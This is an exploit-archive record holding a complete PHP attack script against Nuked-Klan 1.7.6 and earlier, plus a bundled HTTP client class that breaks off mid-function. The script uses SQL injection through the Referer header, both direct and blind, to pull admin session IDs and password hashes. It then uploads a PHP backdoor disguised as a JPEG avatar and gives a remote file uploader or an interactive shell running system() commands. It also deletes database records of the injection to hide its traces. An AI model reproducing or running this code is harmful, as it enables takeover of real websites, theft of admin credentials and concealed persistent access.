{"id": "PACKETSTORM:65120", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "nk_exploit.txt", "description": "", "published": "2008-04-03T00:00:00", "modified": "2008-04-03T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/65120/nk_exploit.txt.html", "reporter": "real", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:16:05", "viewCount": 21, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "_state": {"dependencies": 1678911500, "score": 1683818601, "epss": 1678917342}, "_internal": {"score_hash": "559f8870870c3b47a445c03ced316a5c"}, "sourceHref": "https://packetstormsecurity.com/files/download/65120/nk_exploit.txt", "sourceData": "`<?php \n \n/* \n* Name: Nuked-Klan <= 1.7.6 Multiple Vulnerabilities Exploit \n* Credits: Charles \"real\" F. <charlesfol[at]hotmail.fr> \n* URL: http://realn.free.fr/releases/46556 \n* Date: 04-01-08 \n* \n* -> Remote Code Execution \n* -> Remote File Upload \n* -> Admin Hash Extraction \n* \n* Remote Code Exec vulnerability used in \n* this exploit was discovered by DarkFig. \n*/ \n \nprint \"\\n\"; \nprint \" Nuked-Klan <= 1.7.6 Multiple Vulnerabilities Exploit\\n\"; \nprint \" by Charles \\\"real\\\" F. 
<charlesfol[at]hotmail.fr>\\n\\n\\n\"; \n \nif($argc<3) \n{ \nprint \" usage: ./nk_exploit.php -url <url> [options]\\n\\n\"; \nprint \" Options: -mode 0 -> Remote Upload (default)\\n\"; \nprint \" 1 -> Remote Code Execution\\n\"; \nprint \" 2 -> Admin Hash Extraction\\n\"; \nprint \" -admin If you have an admin account.\\n\"; \nprint \" -user If STATS page needs registration,\\n\"; \nprint \" you can set an account.\\n\"; \nprint \" -proxy If you want to use a proxy.\\n\"; \nprint \" -prefix Cookie prefix (default: nuked_).\\n\"; \nprint \" -file If you wanna upload a specific file\\n\"; \nprint \" else it will upload a simple uploader.\\n\"; \nprint \"\\n\"; \nprint \" eg: ./nk_exploit.php -url http://localhost/nk/ -admin real:passw0rd\\n\"; \nprint \" eg: ./nk_exploit.php -url http://localhost/nk/ -file cshell.php -proxy localhost:8118\\n\\n\"; \ndie(); \n} \n \n$url = getparam(\"url\",1); \n$mode = getparam(\"mode\") ? getparam(\"mode\"): 0; \n$adm = getparam(\"admin\"); \n$acc = getparam(\"user\"); \n$prx = getparam(\"proxy\"); \n \n$prefix = getparam(\"prefix\") ? getparam(\"prefix\") : \"nuked_\"; \n \n$file_upload_code = getparam(\"file\") ? 
file_get_contents(getparam(\"file\")) : '<?php if(isset($_POST[\\'upload\\'])) { if( !move_uploaded_file($_FILES[\\'file\\'][\\'tmp_name\\'], \"./\".$_FILES[\\'file\\'][\\'name\\'])) echo(\"<center>Error \".$_FILES[\\'file\\'][\\'error\\'].\"</center>\");else echo \"<center>File uploaded</center>\"; } ?><form method=\"post\" enctype=\"multipart/form-data\"><center><input type=\"file\" name=\"file\"><input type=\"submit\" name=\"upload\" value=\"Upload\"></center></form>';; \n \n$date = array(date('Y'),date('m'),date('d')); \n \n$xpl = new phpsploit(); \nif($prx) $xpl->proxy($prx); \n \n/* Admin account defined */ \nif($adm) \n{ \nprint \"[*] Using admin account $adm\\n\"; \nlist($login,$passwd) = explode(\":\",$adm); \n$xpl->addheader(\"Referer\",$url); \n$c = $xpl->post($url.\"index.php?file=User&{$prefix}nude=index&op=login\",\"pseudo=$login&pass=$passwd&remember_me=ok\"); \nif(preg_match(\"#{$prefix}sess_id=([a-z0-9]+)#i\",$c,$sid) && preg_match(\"#uid=([a-z0-9]+)#i\",$c,$uid)) \n{ \n$admin_sid = $sid[1]; \n$admin_uid = $uid[1]; \nprint \" SID -> $admin_sid\\n\"; \nprint \" UID -> $admin_uid\\n\"; \nfinalattack($admin_sid,$admin_uid); \n} else exit(\"[*] Can't log in\\n\"); \n} \n/* Admin account not defined */ \nelse \n{ \n/* User account defined */ \nif($acc) \n{ \nprint \"[*] Using user account $acc\\n\"; \nlist($login,$passwd) = explode(\":\",$acc); \n$xpl->addheader(\"Referer\",$url); \n$c = $xpl->post($url.\"index.php?file=User&nuked_nude=index&op=login\",\"pseudo=$login&pass=$passwd&remember_me=ok\"); \nif(preg_match(\"#{$prefix}sess_id=([a-z0-9]+)#i\",$c,$sid) && preg_match(\"#uid=([a-z0-9]+)#i\",$c,$uid)) \n{ \n# User Cookies \n$xpl->addcookie(\"{$prefix}sess_id\",$sid[1]); \n$xpl->addcookie(\"{$prefix}user_id\",$uid[1]); \n} else exit(\"[*] Can't log in\\n\"); \n} \n \n$queries = array(); \n$queries[] = array(\" SID\",\"SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1\"); 
\n$queries[] = array(\" UID\",\"SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1\"); \n$queries[] = array(\" Login\",\"SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1\"); \n$queries[] = array(\"Password\",\"SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1\"); \n \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",\"127.0.0.1\"); \n \n$ctmp = $xpl->get($url.\"index.php?file=Stats&page=visits\"); \n \nif(preg_match('#<a href=\"javascript:history.back\\(\\)\"><b>[^<]+</b>#i',$ctmp)) exit(\"[*] You don't have rights to access Stats page.\\n\"); \nif(preg_match('#<a href=\"index.php\\?file=User&op=login_screen\">[^<]+</a> | <a href=\"index.php\\?file=User&op=reg_screen\">[^<]+</a>#i',$ctmp)) exit(\"[*] You must be registered, use -user param.\\n\"); \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n \nattack1(); \nattack2(); \n} \n \nfunction getparam($param,$opt='') \n{ \nglobal $argv; \nforeach($argv as $value => $key) \n{ \nif($key == '-'.$param) return $argv[$value+1]; \n} \nif($opt) exit(\"\\n-$param parameter required\"); \nelse return; \n} \n \n/* --- Attack #1 ---------------------------------------- */ \n \nfunction attack1() \n{ \nglobal $queries,$mode; \n \nprint \"[*] Attack #1\\n\"; \n \nif($mode != 2) \n{ \nprint \" \".$queries[0][0].\" -> \"; \n$admin_sid = sql_session_query($queries[0][1],0); \n \nif(!$admin_sid) return false; \n \nif($admin_sid==\"\") \n{ \nprint \"\\r[*] No session found. 
Crack following MD5 hash and use -admin param.\\n\"; \nfor($i=2;$i<4;$i++) \n{ \nprint \" \".$queries[$i][0].\" -> \"; \nsql_user_query($queries[$i][1]); \n} \nexit(); \n} \nelse \n{ \nprint \"\\n \".$queries[1][0].\" -> \"; \n$admin_uid = sql_session_query($queries[1][1]); \nfinalattack($admin_sid,$admin_uid); \n} \n} \nelse \n{ \nprint \"\\r[*] Getting admin credentials\\n\"; \nfor($i=2;$i<4;$i++) \n{ \nprint \" \".$queries[$i][0].\" -> \"; \n$z = sql_user_query($queries[$i][1]); \nif(!$z || $z == \"\") return false; \n} \nexit(); \n} \n} \n \nfunction attack1_init() \n{ \nglobal $xpl,$url; \n \n$rnd = rand(100000,999999); \n \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",\"255.255.255.255\"); \n$xpl->addheader(\"Referer\",\"http://g00gle.com','1','1','$rnd','1','1') #\"); \n$xpl->get($url.\"index.php\"); \n \nreturn $rnd; \n} \n \nfunction sql_session_query($query,$z=1) \n{ \n$result = ''; \n$rnd = attack1_init(); \n$size = 20; \nfor($i=1;$i<=$size;$i++) \n{ \n$r = get_ord($query,$i,$rnd); \nif(!$r) break; \n$result .= chr($r); \nprint chr($r); \n} \nif($z==1) print \"\\n\"; \nreturn $result; \n} \n \nfunction sql_user_query($query) \n{ \n$result = ''; \nfor($i=1;$i<=50;$i++) \n{ \n$r = get_ord($query,$i,attack1_init()); \nif(!$r) break; \n$result .= chr($r); \nprint chr($r); \n} \nprint \"\\n\"; \nreturn $result; \n} \n \nfunction get_ord($query,$a,$rnd) \n{ \nglobal $xpl,$url; \n \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",\"255.255.255.255\"); \n$xpl->addheader(\"Referer\",\"http://g00gle.com','1',CONCAT({$a}000,ORD(MID(($query),$a,1))),'$rnd','1','1') #\"); \n$content = $xpl->get($url.\"index.php?file=Stats&page=visits&oyear=$rnd&omonth=1\"); \npreg_match('#<option[^>]*>'.$a.'000(\\d+)</option>[^:]*</select> /#i',$content,$res); \n \nif(!isset($res[1]) && $a==1) \n{ \nprint \"\\r\"; \nprint \"[*] Attack failed.\\n\\n\"; \nreturn false; \n} 
\nif(!isset($res[1])) return \"\"; \nreturn $res[1]; \n} \n \n/* --- Attack #2 ---------------------------------------- */ \n \nfunction attack2() \n{ \nglobal $queries,$mode,$admin_sid,$admin_uid; \n \nprint \"[*] Attack #2\\n\"; \n \nif($mode != 2) \n{ \nprint \" \".$queries[0][0].\" -> \"; \n$admin_sid = blind($queries[0][1],20,48,122); \n \nif($admin_sid==\"\") \n{ \nprint \"\\r[*] No session found. Crack following MD5 hash and use -admin param.\\n\"; \nfor($i=2;$i<4;$i++) \n{ \nprint \" \".$queries[$i][0].\" -> \"; \nblind($queries[$i][1],50,48,122); \nprint \"\\n\"; \n} \nexit(); \n} \nelse \n{ \nprint \"\\n \".$queries[1][0].\" -> \"; \n$admin_uid = blind($queries[1][1],20,48,122); \nprint \"\\n\"; \nfinalattack($admin_sid,$admin_uid); \n} \n} \nelse \n{ \nprint \"\\r[*] Getting admin credentials\\n\"; \nfor($i=2;$i<4;$i++) \n{ \nprint \" \".$queries[$i][0].\" -> \"; \nblind($queries[$i][1],50,48,122); \nprint \"\\n\"; \n} \nexit(); \n} \n} \n \nfunction blind($query,$nbchars,$from,$to) \n{ \nglobal $xpl,$url,$date; \n \n$result = \"\"; \n$current_letter = 1; \n \n/* let's test first if there is a value ... 
*/ \n \n$ip = \"82.237.\".rand(1,10).\".\".rand(1,250); \n$rnd = rand(100,1000000); \n$q = preg_replace(\"#(\\w*) FROM #i\",\"COUNT($1) FROM \",$query,1); \n$sql = \"http://g00gle$rnd.com' OR ($q)>0 #\"; \n \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",$ip); \n$xpl->addheader(\"Referer\",\"$sql\"); \n$c=$xpl->get($url.\"index.php?file=Stats&nuked_nude=visits&op=view_referer&oyear=$date[0]&omonth=$date[1]&oday=$date[2]\"); \nif(!preg_match('#g00gle'.$rnd.'[^>]+</a></td>[\\r\\t\\n]*<td[^>]*>[1-9]\\d* \\(\\d+%\\)</td>#',$xpl->getcontent(),$matches)) return false; \n \nwhile($current_letter<=$nbchars) \n{ \n$add=$from; \nfor($i=intval(($to-$from)/2);$i>1;$i=intval($i/2)) \n{ \nif(get($query,\">\",$current_letter,$add+$i)) $add+=$i+1; \n} \n \nfor($ord=$add;;$ord++) \n{ \nif(get($query,\"=\",$current_letter,$ord)) \n{ \nprint strtolower(chr($ord)); \n$result .= strtolower(chr($ord)); \nbreak; \n} \nelseif($ord==$add+$i+3) return $result; \n} \n \n$current_letter++; \n} \n \nreturn $result; \n} \n \nfunction get($query,$sign,$d,$f) \n{ \nglobal $xpl,$url,$date; \n \nwhile(true) \n{ \n$ip = \"82.237.\".rand(1,10).\".\".rand(1,250); \n$rnd = rand(100,1000000); \n$sql = \"http://g00gle$rnd.com' OR ORD(MID(($query),$d,1))$sign$f #\"; \n \n$xpl->reset(\"header\"); \n$xpl->agent(\"Mozilla Firefox\"); \n$xpl->addheader(\"X-Forwarded-For\",$ip); \n$xpl->addheader(\"Referer\",\"$sql\"); \n$c=$xpl->get($url.\"index.php?file=Stats&nuked_nude=visits&op=view_referer&oyear=$date[0]&omonth=$date[1]&oday=$date[2]\"); \nif(preg_match('#g00gle'.$rnd.'[^>]+</a></td>[\\r\\t\\n]*<td[^>]*>[1-9]\\d* \\(\\d+%\\)</td>#',$xpl->getcontent(),$matches)) return true; \nif(preg_match('#g00gle'.$rnd.'#',$xpl->getcontent())) break; \n} \n \nreturn false; \n} \n \nfunction finalattack($admin_sid,$admin_uid) \n{ \nglobal $url,$xpl,$mode,$prefix,$file_upload_code; \n \nprint \"\\n[*] Admin status confirmed.\\n\"; \n \n# Admin Cookies 
\n$xpl->reset(\"cookie\"); \n$xpl->addcookie(\"{$prefix}sess_id\",$admin_sid); \n$xpl->addcookie(\"{$prefix}user_id\",$admin_uid); \n$xpl->addcookie(\"{$prefix}admin_session\",$admin_uid); \n \nprint \"[*] Uploading fake image ... \"; \n \n/* Code in the fake avatar */ \nif($mode==0) /* upload code */ \n{ \n$c0de = '<?php'.\"\\n\" \n.\"error_reporting(0);\" \n.\"if(isset(\\$_SERVER['HTTP_UPLOAD'])) { \\$f=fopen('w00t.php','w');fputs(\\$f,'\".preg_replace(\"#'#i\",\"\\\\'\",$file_upload_code).\"');print 'upfiledone'; }\\n\" \n.'include(\\'./Includes/blocks/block_login.php\\');$blok[type]=\\'login\\'; ?>'; \n} \nelse /* shell code */ \n{ \n$c0de = '<?php'.\"\\n\" \n.'error_reporting(0);' \n.'if(isset($_SERVER[HTTP_SHELL]))' \n.'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' \n.'else {include(\\'./Includes/blocks/block_login.php\\');$blok[type]=\\'login\\';} ?>'; \n} \n \n/* This is based on DarkFig's code (http://mgsdl.free.fr/?1:30) */ \n/* It was a little changed to permit 2 modes: upload/code exec */ \n \n$phpc = array( \nfrmdt_url => $url.'?file=User&op=update_pref', \n'fichiernom' => array(frmdt_filename => '1.jpg', \nfrmdt_content => $c0de)); \n \n$xpl->addheader('Referer',$url); \n$xpl->formdata($phpc); \n \n$f = fopen(\"zzz.jpg\",\"w\"); \nfputs($f,$c0de); \nfclose($f); \n \n$xpl->get($url.'?file=User&op=edit_pref'); \n \nif(!preg_match('#\\<input name=\\\"photo\\\" value=\\\"(\\S+)\\\"#',$xpl->getcontent(),$match)) exit(\"error.\\n\"); \n \nprint \"done.\\n\"; \n \nprint \"[*] Processing SQL queries ... 
\"; \n \n$sql = array(); \n$sql[] = \"ALTER TABLE nuked_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;\"; \n$sql[] = \"UPDATE nuked_block SET type=\".char('/../../../'.$match[1].\"\\x00\").\" WHERE bid=1;\"; \n$sql[] = \"DELETE FROM nuked_stats_visitor WHERE referer LIKE 0x25673030676c6525;\"; /* added by real to delete our SQL Injection from SQL DB */ \n$sql[] = \"DELETE FROM nuked_nbconnecte;\"; \n \nfor($i=0;$i<count($sql);$i++) \n$xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]); \n \nprint \"done.\\n\"; \n \n/* Final step: File Upload or Code Execution */ \nif($mode==0) /* Upload */ \n{ \n$xpl->addheader(\"Upload\",\"1\"); \n$c = $xpl->get($url); \nif(preg_match(\"#upfiledone#i\",$c)) print \"[*] File uploaded.\\n\\n\"; \nelse exit(\"[*] File upload error.\\n\"); \nprint \"[*] \".$url.\"w00t.php\\n\"; \n} \nelse /* Shell */ \n{ \nprint \"\\n\\$shell> \"; \nwhile(!preg_match(\"#^(quit|exit)$#\",($cmd = trim(fgets(STDIN))))) \n{ \n$xpl->reset('header'); \n$xpl->addheader('Shell',\"system('$cmd');\"); \n$xpl->get($url); \n$data = explode('123456789',$xpl->getcontent()); \nprint $data[1].\"\\n\\$shell> \"; \n} \n} \n \n/* End of DarkFig based code */ \n \nexit(); \n} \n \nfunction char($data) \n{ \n$char='CHAR('; \nfor($i=0;$i<strlen($data);$i++) \n{ \n$char .= ord($data[$i]); \nif($i != (strlen($data)-1)) $char .= ','; \n} \nreturn $char.')'; \n} \n \n/* \n* \n* Copyright (C) darkfig \n* \n* This program is free software; you can redistribute it and/or \n* modify it under the terms of the GNU General Public License \n* as published by the Free Software Foundation; either version 2 \n* of the License, or (at your option) any later version. \n* \n* This program is distributed in the hope that it will be useful, \n* but WITHOUT ANY WARRANTY; without even the implied warranty of \n* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the \n* GNU General Public License for more details. \n* \n* You should have received a copy of the GNU General Public License \n* along with this program; if not, write to the Free Software \n* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. \n* \n* TITLE: PhpSploit Class \n* REQUIREMENTS: PHP 5 (remove \"private\", \"public\" if you have PHP 4) \n* VERSION: 1.2 \n* LICENSE: GNU General Public License \n* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt \n* FILENAME: phpsploitclass.php \n* \n* CONTACT: gmdarkfig@gmail.com (french / english) \n* GREETZ: Sparah, Ddx39 \n* \n* DESCRIPTION: \n* The phpsploit is a class implementing a web user agent. \n* You can add cookies, headers, use a proxy server with (or without) a \n* basic authentication. It supports the GET and the POST method. It can \n* also be used like a browser with the cookiejar() function (which allows \n* a server to add several cookies for the next requests) and the \n* allowredirection() function (which allows the script to follow all \n* redirections sent by the server). It can return the content (or the \n* headers) of the request. Other useful functions can be used for debugging. \n* A manual is currently in development but to know how to use it, you can \n* read the comments. \n* \n* CHANGELOG: \n* [2007-01-24] (1.2) \n* * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) \n* * New: multipart/form-data enctype is now supported \n* \n* [2006-12-31] (1.1) \n* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) \n* * New: You can now call the getheader() / getcontent() function without parameters \n* \n* [2006-12-30] (1.0) \n* * First version \n* \n*/ \n \nclass phpsploit { \n \n/** \n* This function is called by the get()/post() functions. \n* You don't have to call it, this is the main function. 
\n* \n* @return $server_response \n*/ \nprivate function sock() \n{ \nif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport); \nelse $socket = fsockopen($this->host,$this->port); \n \nif(!$socket) die(\"Error: The host doesn't exist\"); \n \nif($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1\\r\\n\"; \nelseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. \" HTTP/1.1\\r\\n\"; \nelse die(\"Error: Invalid method\"); \n \nif(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"\\r\\n\"; \n$this->packet .= \"Host: \".$this->host.\"\\r\\n\"; \n \nif(!empty($this->agent)) $this->packet .= \"User-Agent: \".$this->agent.\"\\r\\n\"; \nif(!empty($this->header)) $this->packet .= $this->header.\"\\r\\n\"; \nif(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"\\r\\n\"; \n \n$this->packet .= \"Connection: Close\\r\\n\"; \nif($this->method===\"post\") \n{ \n$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\"; \n$this->packet .= $this->data.\"\\r\\n\"; \n} \nelseif($this->method===\"formdata\") \n{ \n$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"\\r\\n\"; \n$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\"; \n$this->packet .= $this->data; \n} \n$this->packet .= \"\\r\\n\"; \n$this->recv = ''; \n \nfputs($socket,$this->packet); \nwhile(!feof($socket)) $this->recv .= fgets($socket); \nfclose($socket); \n \nif($this->cookiejar) $this->cookiejar($this->getheader($this->recv)); \nif($this->allowredirection) return $this->allowredirection($this->recv); \nelse return $this->recv; \n} \n \n \n/** \n* This function allows you to add several cookie in the \n* request. 
Several methods are supported: \n* \n* $this->addcookie(\"name\",\"value\"); \n* or \n* $this->addcookie(\"name=newvalue\"); \n* or \n* $this->addcookie(\"othername=overvalue; xx=zz; y=u\"); \n* \n* @param string $cookiename \n* @param string $cookievalue \n* \n*/ \npublic function addcookie($cookn,$cookv='') \n{ \n// $this->addcookie(\"name\",\"value\"); work avec replace \nif(!empty($cookv)) \n{ \nif($cookv === \"deleted\") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete \nif(!empty($this->cookie)) \n{ \nif(preg_match(\"/$cookn=/\",$this->cookie)) \n{ \n$this->cookie = preg_replace(\"/$cookn=(\\S*);/\",\"$cookn=$cookv;\",$this->cookie); \n} \nelse \n{ \n$this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \". \n} \n} \nelse \n{ \n$this->cookie = $cookn.\"=\".$cookv.\";\"; \n} \n} \n// $this->addcookie(\"name=value; othername=othervalue\"); \nelse \n{ \nif(!empty($this->cookie)) \n{ \n$cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn); \n$cookarr = explode(\";\",str_replace(\" \", \"\",$cookn)); \nfor($i=0;$i<count($cookarr);$i++) \n{ \npreg_match(\"/(\\S*)=(\\S*)/\",$cookarr[$i],$matches); \n$cookn = $matches[1]; \n$cookv = $matches[2]; \n$this->addcookie($cookn,$cookv); \n} \n} \nelse \n{ \n$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\"; \n$this->cookie = $cookn; \n} \n} \n} \n \n \n/** \n* This function allows you to add several headers in the \n* request. 
Several methods are supported: \n* \n* $this->addheader(\"headername\",\"headervalue\"); \n* or \n* $this->addheader(\"headername: headervalue\"); \n* \n* @param string $headername \n* @param string $headervalue \n*/ \npublic function addheader($headern,$headervalue='') \n{ \n// $this->addheader(\"name\",\"value\"); \nif(!empty($headervalue)) \n{ \nif(!empty($this->header)) \n{ \nif(preg_match(\"/$headern:/\",$this->header)) \n{ \n$this->header = preg_replace(\"/$headern: (\\S*)/\",\"$headern: $headervalue\",$this->header); \n} \nelse \n{ \n$this->header .= \"\\r\\n\".$headern.\": \".$headervalue; \n} \n} \nelse \n{ \n$this->header=$headern.\": \".$headervalue; \n} \n} \n// $this->addheader(\"name: value\"); \nelse \n{ \nif(!empty($this->header)) \n{ \n$headarr = explode(\": \",$headern); \n$headern = $headarr[0]; \n$headerv = $headarr[1]; \n$this->addheader($headern,$headerv); \n} \nelse \n{ \n$this->header=$headern; \n} \n} \n} \n \n \n/** \n* This function allows you to use an http proxy server. \n* Several methods are supported: \n* \n* $this->proxy(\"proxyip\",\"8118\"); \n* or \n* $this->proxy(\"proxyip:8118\") \n* \n* @param string $proxyhost \n* @param integer $proxyport \n*/ \npublic function proxy($proxy,$proxyp='') \n{ \n// $this->proxy(\"localhost:8118\"); \nif(empty($proxyp)) \n{ \npreg_match(\"/^(\\S*):(\\d+)$/\",$proxy,$proxarr); \n$proxh = $proxarr[1]; \n$proxp = $proxarr[2]; \n$this->proxyhost=$proxh; \n$this->proxyport=$proxp; \n} \n// $this->proxy(\"localhost\",8118); \nelse \n{ \n$this->proxyhost=$proxy; \n$this->proxyport=intval($proxyp); \n} \nif($this->proxyport > 65535) die(\"Error: Invalid port number\"); \n} \n \n \n/** \n* This function allows you to use an http proxy server \n* which requires a basic authentification. 
Several \n* methods are supported: \n* \n* $this->proxyauth(\"darkfig\",\"dapasswd\"); \n* or \n* $this->proxyauth(\"darkfig:dapasswd\"); \n* \n* @param string $proxyuser \n* @param string $proxypass \n*/ \npublic function proxyauth($proxyauth,$proxypasse='') \n{ \n// $this->proxyauth(\"darkfig:password\"); \nif(empty($proxypasse)) \n{ \npreg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr); \n$proxu = $proxautharr[1]; \n$proxp = $proxautharr[2]; \n$this->proxyuser=$proxu; \n$this->proxypass=$proxp; \n} \n// $this->proxyauth(\"darkfig\",\"password\"); \nelse \n{ \n$this->proxyuser=$proxyauth; \n$this->proxypass=$proxypasse; \n} \n} \n \n \n/** \n* This function allows you to set the \"User-Agent\" header. \n* Several methods are possible to do that: \n* \n* $this->agent(\"Mozilla Firefox\"); \n* or \n* $this->addheader(\"User-Agent: Mozilla Firefox\"); \n* or \n* $this->addheader(\"User-Agent\",\"Mozilla Firefox\"); \n* \n* @param string $useragent \n*/ \npublic function agent($useragent) \n{ \n$this->agent=$useragent; \n} \n \n \n/** \n* This function returns the header which will be \n* in the next request. \n* \n* $this->showheader(); \n* \n* @return $header \n*/ \npublic function showheader() \n{ \nreturn $this->header; \n} \n \n \n/** \n* This function returns the cookie which will be \n* in the next request. \n* \n* $this->showcookie(); \n* \n* @return $storedcookies \n*/ \npublic function showcookie() \n{ \nreturn $this->cookie; \n} \n \n \n/** \n* This function returns the last formed \n* http request (the http packet). \n* \n* $this->showlastrequest(); \n* \n* @return $last_http_request \n*/ \npublic function showlastrequest() \n{ \nreturn $this->packet; \n} \n \n \n/** \n* This function sends the formed http packet with the \n* GET method. You can precise the port of the host. 
\n* \n* $this->get(\"http://localhost\"); \n* $this->get(\"http://localhost:888/xd/tst.php\"); \n* \n* @param string $urlwithpath \n* @return $server_response \n*/ \npublic function get($url) \n{ \n$this->target($url); \n$this->method=\"get\"; \nreturn $this->sock(); \n} \n \n \n/** \n* This function sends the formed http packet with the \n* POST method. You can precise the port of the host. \n* \n* $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\"); \n* \n* @param string $urlwithpath \n* @param string $postdata \n* @return $server_response \n*/ \npublic function post($url,$data) \n{ \n$this->target($url); \n$this->method=\"post\"; \n$this->data=$data; \nreturn $this->sock(); \n} \n \n \n/** \n* This function sends the formed http packet with the \n* POST method using the multipart/form-data enctype. \n* \n* $array = array( \n* frmdt_url => \"http://localhost/upload.php\", \n* frmdt_boundary => \"123456\", # Optional \n* \"email\" => \"me@u.com\", \n* \"varname\" => array( \n* frmdt_type => \"image/gif\", # Optional \n* frmdt_transfert => \"binary\", # Optional \n* frmdt_filename => \"hello.php\", \n* frmdt_content => \"<?php echo ':)'; ?>\")); \n* $this->formdata($array); \n* \n* @param array $array \n* @return $server_response \n*/ \npublic function formdata($array) \n{ \n$this->target($array[frmdt_url]); \n$this->method=\"formdata\"; \n$this->data=''; \nif(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\"; \nelse $this->boundary=$array[frmdt_boundary]; \nforeach($array as $key => $value) \n{ \nif(!preg_match(\"#^frmdt_(boundary|url)#\",$key)) \n{ \n$this->data .= \"-----------------------------\".$this->boundary.\"\\r\\n\"; \n$this->data .= \"Content-Disposition: form-data; name=\\\"\".$key.\"\\\";\"; \nif(!is_array($value)) \n{ \n$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\"; \n} \nelse \n{ \n$this->data .= \" filename=\\\"\".$array[$key][frmdt_filename].\"\\\";\\r\\n\"; \nif(isset($array[$key][frmdt_type])) $this->data .= 
\"Content-Type: \".$array[$key][frmdt_type].\"\\r\\n\"; \nif(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"\\r\\n\"; \n$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\"; \n} \n} \n} \n$this->data .= \"-----------------------------\".$this->boundary.\"--\\r\\n\"; \nreturn $this->sock(); \n} \n \n \n/** \n* This function returns the content of the server response \n* without the headers. \n* \n* $this->getcontent($this->get(\"http://localhost/\")); \n* or \n* $this->getcontent(); \n* \n* @param string $server_response \n* @return $onlythecontent \n*/ \npublic function getcontent($code='') \n{ \nif(empty($code)) $code = $this->recv; \n$content = explode(\"\\n\",$code); \n$onlycode = ''; \nfor($i=1;$i<count($content);$i++) \n{ \nif(!preg_match(\"/^(\\S*):/\",$content[$i])) $ok = 1; \nif($ok) $onlycode .= $content[$i].\"\\n\"; \n} \nreturn $onlycode; \n} \n \n \n/** \n* This function returns the headers of the server response \n* without the content. \n* \n* $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\")); \n* or \n* $this->getheader(); \n* \n* @param string $server_response \n* @return $onlytheheaders \n*/ \npublic function getheader($code='') \n{ \nif(empty($code)) $code = $this->recv; \n$header = explode(\"\\n\",$code); \n$onlyheader = $header[0].\"\\n\"; \nfor($i=1;$i<count($header);$i++) \n{ \nif(!preg_match(\"/^(\\S*):/\",$header[$i])) break; \n$onlyheader .= $header[$i].\"\\n\"; \n} \nreturn $onlyheader; \n} \n \n \n/** \n* This function is called by the cookiejar() function. \n* It adds the value of the \"Set-Cookie\" header in the \"Cookie\" \n* header for the next request. You don't have to call it. 
\n* \n* @param string $server_response \n*/ \nprivate function getcookie($code) \n{ \n$carr = explode(\"\\n\",str_replace(\"\\r\\n\",\"\\n\",$code)); \nfor($z=0;$z<count($carr);$z++) \n{ \nif(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr)) \n{ \n$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(\\S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1])); \n} \n} \n \nfor($i=0;$i<count($cookie);$i++) \n{ \npreg_match(\"/(\\S*)=(\\S*)(|;)/\",$cookie[$i],$matches); \n$cookn = $matches[1]; \n$cookv = $matches[2]; \n$this->addcookie($cookn,$cookv); \n} \n} \n \n \n/** \n* This function is called by the get()/post() functions. \n* You don't have to call it. \n* \n* @param string $urltarg \n*/ \nprivate function target($urltarg) \n{ \nif(!preg_match(\"/^http:\\/\\/(.*)\\//\",$urltarg)) $urltarg .= \"/\"; \n$this->url=$urltarg; \n \n$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg))); \n$this->host=$array[0]; \n 